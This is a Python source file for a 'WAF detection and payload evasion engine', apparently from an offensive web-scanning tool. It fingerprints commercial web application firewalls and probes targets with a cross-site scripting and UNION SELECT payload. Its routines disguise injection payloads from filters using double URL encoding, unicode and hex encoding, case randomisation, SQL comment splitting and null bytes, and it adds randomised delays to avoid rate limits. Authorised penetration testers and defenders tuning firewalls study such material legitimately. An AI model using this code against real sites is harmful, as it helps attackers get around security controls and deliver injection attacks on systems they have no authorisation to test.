import time
import random
import urllib.parse
from colorama import Fore, Style

class WAFEngine:
    """
    Intelligent WAF Detection and Advanced Payload Evasion Engine.
    """
    WAF_SIGNATURES = {
        "Cloudflare": {"headers": {"server": "cloudflare"}, "content": ["cloudflare-nginx", "cf-ray"]},
        "AWS WAF": {"headers": {"server": "awselb"}, "content": ["aws waf", "403 forbidden"]},
        "Akamai": {"headers": {"server": "akamai"}, "content": ["akamai ghost"]},
        "Sucuri": {"headers": {"server": "sucuri"}, "content": ["sucuri web site firewall"]},
        "Wordfence": {"headers": {}, "content": ["generated by wordfence", "your access to this site has been limited"]},
        "F5 BIG-IP": {"headers": {"server": "big-ip"}, "content": []},
        "ModSecurity": {"headers": {}, "content": ["mod_security", "modsecurity", "not acceptable"]},
        "Imperva/Incapsula": {"headers": {}, "content": ["incapsula", "imperva"]},
    }

    def __init__(self):
        self.detected_waf = None
        self.rate_limit_delay = 0
        self._evasion_techniques = [
            self._url_encode,
            self._double_url_encode,
            self._unicode_encode,
            self._case_switch,
            self._comment_insert,
            self._null_byte_insert,
            self._hex_encode_keywords,
        ]

    def detect(self, target_url, session=None):
        """Detect WAF presence using headers and a generic blocked payload."""
        print(f"[{Fore.BLUE}*{Style.RESET_ALL}] Analyzing target for Web Application Firewalls (WAF)...")
        try:
            import requests as fallback_req
            _get = session.get if session else fallback_req.get

            # Send a normal request to check headers
            r_normal = _get(target_url, timeout=5)
            self._analyze_response(r_normal)

            # Send a malicious request to trigger block pages
            malicious_url = f"{target_url}?test=<script>alert(1)</script> UNION SELECT 1,2,3--"
            r_mal = _get(malicious_url, timeout=5)
            
            if r_mal.status_code in [403, 406, 429, 503]:
                self._analyze_response(r_mal)
                
            if self.detected_waf:
                print(f"  [{Fore.RED}!{Style.RESET_ALL}] WAF Detected: {Fore.YELLOW}{self.detected_waf}{Style.RESET_ALL}")
                self.rate_limit_delay = 0.5
            else:
                print(f"  [{Fore.GREEN}+{Style.RESET_ALL}] No WAF detected. Proceeding with standard speeds.")
                
        except Exception:
            pass
            
        return self.detected_waf

    def _analyze_response(self, response):
        headers_lower = {k.lower(): v.lower() for k, v in response.headers.items()}
        text_lower = response.text.lower()
        
        for waf_name, sig in self.WAF_SIGNATURES.items():
            for h_key, h_val in sig["headers"].items():
                if h_key in headers_lower and h_val in headers_lower[h_key]:
                    self.detected_waf = waf_name
                    return
            for c_val in sig["content"]:
                if c_val in text_lower:
                    self.detected_waf = waf_name
                    return

    def evade(self, payload):
        """Intelligently obfuscate payload based on the detected WAF."""
        if not self.detected_waf:
            return payload

        # Chain 1-3 random techniques for stronger evasion
        num_techniques = random.randint(1, 3)
        chosen = random.sample(self._evasion_techniques, min(num_techniques, len(self._evasion_techniques)))
        
        evaded = payload
        for technique in chosen:
            evaded = technique(evaded)
        return evaded

    # ─── Evasion Techniques ───

    def _url_encode(self, payload):
        """Standard URL encoding of special chars."""
        return urllib.parse.quote(payload)

    def _double_url_encode(self, payload):
        """Bypasses WAFs that decode only once before analyzing."""
        return urllib.parse.quote(urllib.parse.quote(payload))

    def _unicode_encode(self, payload):
        """Unicode encoding (e.g. < -> %u003c)"""
        encoded = ""
        for char in payload:
            if not char.isalnum():
                encoded += f"%u00{hex(ord(char))[2:].zfill(2)}"
            else:
                encoded += char
        return encoded

    def _case_switch(self, payload):
        """Randomize case of SQL/HTML keywords (SeLeCt, ScRiPt)."""
        keywords = ['select', 'union', 'insert', 'update', 'delete', 'drop', 'script',
                     'alert', 'onerror', 'onload', 'eval', 'from', 'where', 'order',
                     'group', 'having', 'limit', 'and', 'or', 'not', 'null']
        result = payload
        for kw in keywords:
            if kw in result.lower():
                randomized = ''.join(c.upper() if random.random() > 0.5 else c.lower() for c in kw)
                # Case-insensitive replace
                import re
                result = re.sub(re.escape(kw), randomized, result, flags=re.IGNORECASE)
        return result

    def _comment_insert(self, payload):
        """Insert SQL comments inside keywords (SEL/**/ECT) to break pattern matching."""
        sql_keywords = ['SELECT', 'UNION', 'INSERT', 'UPDATE', 'DELETE', 'FROM', 'WHERE', 'ORDER']
        result = payload
        for kw in sql_keywords:
            if kw.lower() in result.lower():
                # Split keyword in half and insert comment
                mid = len(kw) // 2
                broken = kw[:mid] + "/**/" + kw[mid:]
                import re
                result = re.sub(re.escape(kw), broken, result, flags=re.IGNORECASE)
        return result

    def _null_byte_insert(self, payload):
        """Insert null bytes (%00) before keywords — some WAFs stop parsing at null."""
        triggers = ['<script', '<img', 'onerror', 'onload', 'UNION', 'SELECT']
        result = payload
        for t in triggers:
            if t.lower() in result.lower():
                import re
                result = re.sub(re.escape(t), "%00" + t, result, flags=re.IGNORECASE, count=1)
        return result

    def _hex_encode_keywords(self, payload):
        """Hex-encode SQL keywords (e.g., SELECT -> 0x53454c454354)."""
        sql_keywords = ['SELECT', 'UNION', 'INSERT', 'UPDATE', 'DELETE']
        result = payload
        for kw in sql_keywords:
            if kw.lower() in result.lower():
                hex_val = "0x" + kw.encode().hex()
                import re
                result = re.sub(re.escape(kw), hex_val, result, flags=re.IGNORECASE)
        return result

    def request(self, method, url, **kwargs):
        """Legacy wrapper — maintained for backward compat but session is preferred."""
        import requests
        if self.rate_limit_delay > 0:
            time.sleep(self.rate_limit_delay + random.uniform(0.1, 0.5))
        return requests.request(method, url, **kwargs)
